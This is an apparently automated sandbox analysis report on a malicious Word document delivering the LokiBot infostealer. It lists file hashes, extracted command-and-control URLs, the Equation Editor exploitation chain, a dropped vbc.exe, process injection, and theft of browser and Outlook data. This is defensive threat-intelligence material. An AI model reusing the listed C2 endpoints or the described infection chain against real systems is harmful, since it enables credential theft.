Analysis
-
max time kernel
102s -
max time network
105s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
22-02-2023 18:42
Static task
static1
Behavioral task
behavioral1
Sample
RE PO02366.docx
Resource
win10-20230220-en
Behavioral task
behavioral2
Sample
RE PO02366.docx
Resource
win7-20230220-en
Behavioral task
behavioral3
Sample
RE PO02366.docx
Resource
win10v2004-20230220-en
General
-
Target
RE PO02366.docx
-
Size
10KB
-
MD5
352573ea247c865918062df15a57fd90
-
SHA1
69699e27cfc37916b60c5b63340c550f1750810d
-
SHA256
0fc64d847655fe5a6f90a06fbb2ca5f5e4848701c4f18c1d2cda39aca390952e
-
SHA512
8ef10f279da88da64d69d58843d875d4d922438e09eb3896a2392ebc91b1b9dcca27fa3acaba52cc2d0403c365dac139a583378cd4ecdcc41471e7227ad13f8b
-
SSDEEP
192:ScIMmtP0xfUW70vG/b3kgOi4OUdVuus+1pReDnc37yCdt:SPX+si10ni4OiVMyeDnMuCr
Malware Config
Extracted
lokibot
http://208.67.105.148/sung/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 7 924 EQNEDT32.EXE -
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location 2 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\Common\Offline\Files\http://3235029245/OO-OO-OO.DOC WINWORD.EXE Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\14.0\Common WINWORD.EXE -
Executes dropped EXE 6 IoCs
Processes:
vbc.exevbc.exevbc.exevbc.exevbc.exevbc.exepid process 1756 vbc.exe 1832 vbc.exe 1812 vbc.exe 1828 vbc.exe 1892 vbc.exe 1612 vbc.exe -
Loads dropped DLL 5 IoCs
Processes:
EQNEDT32.EXEpid process 924 EQNEDT32.EXE 924 EQNEDT32.EXE 924 EQNEDT32.EXE 924 EQNEDT32.EXE 924 EQNEDT32.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook vbc.exe Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook vbc.exe Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook vbc.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
vbc.exedescription pid process target process PID 1756 set thread context of 1612 1756 vbc.exe vbc.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2016 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
vbc.exepid process 1756 vbc.exe 1756 vbc.exe 1756 vbc.exe 1756 vbc.exe 1756 vbc.exe 1756 vbc.exe 1756 vbc.exe 1756 vbc.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
vbc.exevbc.exeWINWORD.EXEdescription pid process Token: SeDebugPrivilege 1756 vbc.exe Token: SeDebugPrivilege 1612 vbc.exe Token: SeShutdownPrivilege 2016 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2016 WINWORD.EXE 2016 WINWORD.EXE -
Suspicious use of WriteProcessMemory 34 IoCs
Processes:
EQNEDT32.EXEWINWORD.EXEvbc.exedescription pid process target process PID 924 wrote to memory of 1756 924 EQNEDT32.EXE vbc.exe PID 924 wrote to memory of 1756 924 EQNEDT32.EXE vbc.exe PID 924 wrote to memory of 1756 924 EQNEDT32.EXE vbc.exe PID 924 wrote to memory of 1756 924 EQNEDT32.EXE vbc.exe PID 2016 wrote to memory of 1616 2016 WINWORD.EXE splwow64.exe PID 2016 wrote to memory of 1616 2016 WINWORD.EXE splwow64.exe PID 2016 wrote to memory of 1616 2016 WINWORD.EXE splwow64.exe PID 2016 wrote to memory of 1616 2016 WINWORD.EXE splwow64.exe PID 1756 wrote to memory of 1832 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1832 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1832 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1832 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1812 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1812 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1812 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1812 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1828 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1828 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1828 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1828 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1892 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1892 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1892 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1892 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe PID 1756 wrote to memory of 1612 1756 vbc.exe vbc.exe -
outlook_office_path 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook vbc.exe -
outlook_win_path 1 IoCs
Processes:
vbc.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook vbc.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RE PO02366.docx"1⤵
- Abuses OpenXML format to download file from external location
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
-
C:\Users\Public\vbc.exe"C:\Users\Public\vbc.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{FB18CB5E-E65C-47E2-A617-3285658E63B3}.FSDFilesize
128KB
MD59a70af619a8080c02ce54f610fd1b5bb
SHA1dcb24cba40ba306fbdb8716ea94c6300f6901d1b
SHA256fc6721ed809b91b21b5c7013591aa090c99e6dd27901be87d3e0ab4ee181f3d0
SHA512faca554477336bf0a17528215e0b063ed4e34c79b28425201a5f532462852da98c63b6f73ea59a6913336690cc506665ea27da5aa30c3aac5103e10e66cbc347
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDFilesize
128KB
MD56278d74fd51e9b07f006c296e8cf40a6
SHA15be082522a0b01a8369659f04d9f1a6dcbf6d38a
SHA25690598574e4634262a2b438f7c99aac7188a83f06470088db40f29a98add0601f
SHA5129f8ff6a0e4a4d88a0743f5da24b0f99d87afafdb38180611f27f278ccba7d5acacd47e1040d007e5128168048e548d822672def64af0f4d5fe801110cd9c02d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TOS3MI7U\OO-OO-OO[1].docFilesize
13KB
MD512592e047d6a24925a0f71e84618c828
SHA1d808fc6c513b301f65ff83ca258ed83d04bc3ce0
SHA2568952a605589e5137455aa1b31c6d3be650f920dc090e82e090e3951e249d6acc
SHA5123e598a3f6783c46ae4f71aa3c07a3519a2a71522607063390618faede79235a0c7070b49b2ba9a8de92c0770beb2ece2c769f6d8983b64ccaddca073557d6192
-
C:\Users\Admin\AppData\Local\Temp\{D26A27C0-A766-44F9-96B0-CC2BF6ADCAC7}Filesize
128KB
MD5735e9bc0fa888919616b58475a8a1bf2
SHA118eb1fdf65135a246a554f478b1b68cfa4702396
SHA25658bd2cdc46a54bb79b65df20f9680fe424a6ca5b8a6c3417f29f54dfc950d611
SHA5122d01abaf2099c7939c96907c514c95ed4225fa5b4ea252aaa307a83634bf362f3a9133dc39c0bd91b7eece89bd6ce1f5db5fbc259e1d7e13d2c358da69ceeb26
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
20KB
MD5e8e662a0a48ea03170d1fd4e8a9dd848
SHA1eb8f97e4f1cd06ce07596fc8e5a17f67d42d2dea
SHA25684d452418b9cd212f2249860faf5b250662820c22f33fb27a5268356a09a7a38
SHA512a209fd98c67f930b14ca12ea177494a1cbba5bc0ba18778567f43791bb2dee0090c1d3fdb8e88f64810464b59bb1ffcc9d02474914ab39bf0bd0a989d56d3371
-
C:\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
C:\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
C:\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
C:\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
C:\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
C:\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
C:\Users\Public\vbc.exeFilesize
847KB
MD504c980db0dbdf3b2a2b93e02a1797754
SHA149046b40bba2937ff84dce8a63d8793279a64c43
SHA256bf53b54b9edea2783c305fa6d1fd87e298b4d4506c587068dd6e6dd268c80424
SHA51254cdc011152815d8950a832add0448927d25450d38cd1d079ebf8936d2229a9d4c757b88b4871ccfaa8c23f7708c3fe6f3f7b2ece9eae75c4820786e5af125db
-
